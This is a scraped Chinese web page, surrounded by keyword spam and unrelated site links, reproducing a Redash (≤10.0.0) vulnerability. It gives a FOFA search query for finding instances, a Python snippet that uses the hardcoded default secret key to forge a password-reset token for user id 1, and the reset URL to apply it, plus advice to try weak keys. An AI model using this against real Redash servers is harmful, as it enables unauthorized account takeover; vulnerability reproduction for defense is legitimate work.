当前位置: 首页 > news >正文

制作网站的软件手机版兰州做网站企业

制作网站的软件手机版,兰州做网站企业,建筑材料网,网站建设系统优势Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞#xff0c;攻击者可利用该漏洞来使用已知的默认值伪造会话。 1.漏洞级别 中危 2.漏洞搜索 fofa redash…Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞攻击者可利用该漏洞来使用已知的默认值伪造会话。 1.漏洞级别 中危 2.漏洞搜索 fofa redash3.影响范围 Redash 10.0.04.漏洞复现 漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key如果用户不手动修改的话我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token因此我们可以直接生成一个有效的找回链接。 可以执行如下python代码 from itsdangerous import URLSafeTimedSerializer if __name__ __main__:serializer URLSafeTimedSerializer(c292a0a3aa32397cdb050e233733900f)key serializer.dumps(1)print(key)生成的有效负载 IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18由于生成的有效负载存在过期时间因此每次测试的时候最好重新生成一下。c292a0a3aa32397cdb050e233733900f为默认key。如果用户手动修改了这个key我们也可以尝试使用一些弱口令来生成负载尝试一下。 访问路径 url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18如果出现即为漏洞存在 出现这个表示key已被修改过了 到这里漏洞就复现成功了。 如果有问题欢迎随时沟通
http://www.hkea.cn/news/14578378/

相关文章:

  • 学校网站 模板做医疗器械网站
  • 传扬互动网站建设公司网站建设什么软件
  • 网站图标素材图片建设部城市管理监督局网站官网
  • 易语言可以做网站么网站开发技术实验教程
  • 网站建设的公司地址电脑上免费制作ppt的软件
  • 033340网站建设与管理wordpress 婚礼
  • 个人网站费用如何建设专业化的网站
  • dede电影网站模板网站设计与建设公司
  • 企业网站备案策划网站站建设
  • 企业网站如何去做优化海外网站购物平台有哪些
  • 贵阳网站建设专家华大集团 做网站
  • 彩票网站开发需要多少钱已备案域名购买网址低价
  • 什么类型的网站网站维护的主要内容包括
  • 书店商城网站建设方案公司网站模板凡建站
  • 住房和城乡建设部网站八大员vs2008 做网站
  • 建设个人网站流程手机软件开发用什么语言
  • 网站建设与用户需求分析黄页88官网
  • 专业网站开发哪里有天津做网站的企业
  • 厦门营销网站建设公司汨罗做网站价格
  • 网站开发 python软件公司招聘网站
  • 暴雪游戏代理最新消息seo优化排名易下拉程序
  • wordpress扒站工具台州网页设计模板
  • 蜜桃汇免费的wordpress账号优化网站搭建
  • 湖南网站seo品牌推广外包
  • 比较好的外贸网站新网站怎么快速收录
  • 承德网站建设公司手机如何制作软件app
  • 电子商务网站建设ppt运城市盐湖区姚孟精诚网站开发中心
  • 做订票网站设计要多久永州做网站的公司
  • 做棋牌游戏网站犯法吗建站公司是什么意思
  • 秀洲区住房和城乡建设局网站兰州网站优化服务